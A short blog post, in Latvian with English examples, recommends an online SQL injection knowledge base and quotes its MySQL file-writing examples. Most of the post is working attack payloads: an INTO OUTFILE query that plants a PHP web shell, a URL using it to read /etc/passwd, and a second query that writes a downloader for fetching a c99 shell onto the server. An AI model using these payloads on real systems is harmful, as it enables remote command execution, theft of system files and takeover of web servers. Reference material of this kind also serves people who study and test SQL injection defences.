SQL injection Knowledge Base

Pilnīgākais resurss, kuru esmu redzējis saistība ar SQL injekcijām.
http://websec.ca/kb/sql_injection

Tiem, kam interesē cik vienkārši var izmantojot kļūdaini uzrakstītas komandas un sql augšpielādes shell skatās piemēru šeit:

http://websec.ca/kb/sql_injection#MySQL_Writing_Files

Examples:

      • To write a PHP shell:
      • SELECT ‘<? system($_GET[\’c\’]); ?>’ INTO OUTFILE ‘/var/www/shell.php’;

 

      • and then access it at:
      • http://localhost/shell.php?c=cat%20/etc/passwd
      • To write a downloader:
      • SELECT ‘<? fwrite(fopen($_GET[f], \’w\’), file_get_contents($_GET[u])); ?>’ INTO OUTFILE ‘/var/www/get.php’

 

    • and then access it at:
    • http://localhost/get.php?f=shell.php&u=http://localhost/c99.txt

Leave a Reply